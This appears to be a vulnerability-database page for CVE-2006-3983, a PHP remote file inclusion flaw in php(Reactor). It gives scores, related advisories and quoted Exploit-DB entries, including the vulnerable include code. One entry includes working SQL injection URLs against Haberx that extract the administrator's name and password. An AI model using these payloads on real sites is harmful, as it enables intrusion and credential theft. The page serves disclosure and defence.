CVE-2006-3983
published 2006-08-05CVE-2006-3983: PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.43%
82.2th percentile
PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ekilat_llc | php | — | — |
| phpreactor | phpreactor | <= 1.2.7 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6hhc-q66q-7rp2: PHP remote file inclusion vulnerability in editprofile
ghsa_unreviewed·2022-05-01
CVE-2006-3983 [HIGH] GHSA-6hhc-q66q-7rp2: PHP remote file inclusion vulnerability in editprofile
PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter.
GHSA
GHSA-q45m-2998-2qff: Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3066 [HIGH] GHSA-q45m-2998-2qff: Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1
Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1.2.7 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter to (1) view.inc.php, (2) users.inc.php, (3) updatecms.inc.php, and (4) polls.inc.php in inc/; and other unspecified files, different vectors than CVE-2006-3983.
No detection rules found.
Exploit-DB
Haberx 1.02 < 1.1 - 'tr' SQL Injection
exploitdb·2006-09-15
CVE-2006-4853 Haberx 1.02 < 1.1 - 'tr' SQL Injection
Haberx 1.02 < 1.1 - 'tr' SQL Injection
---
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In : kategorix.asp
+ Risk : High
+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1
+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1
# milw0rm.com [2006-09-15]
Exploit-DB
PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion
exploitdb·2006-07-31
CVE-2006-3983 PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion
PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion
---
########################### www.system-defacers.org ###############
# Found By CeNGiZ-HaN [email protected]
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################
# Vulnerable Code in editprofile.php
# //INCLUDE DB FUNCTIONS
# if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
# //INCLUDE LANGUAGE FUNCTIONS
# if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
# //INCLUDE USERS FUNCTIONS
# if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
# //INCLUDE BBS FUNCTIONS
# if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"
No writeups or analysis indexed.
http://www.securityfocus.com/bid/19259http://www.vupen.com/english/advisories/2006/3087https://exchange.xforce.ibmcloud.com/vulnerabilities/28100https://www.exploit-db.com/exploits/2095http://www.securityfocus.com/bid/19259http://www.vupen.com/english/advisories/2006/3087https://exchange.xforce.ibmcloud.com/vulnerabilities/28100https://www.exploit-db.com/exploits/2095
2006-08-05
Published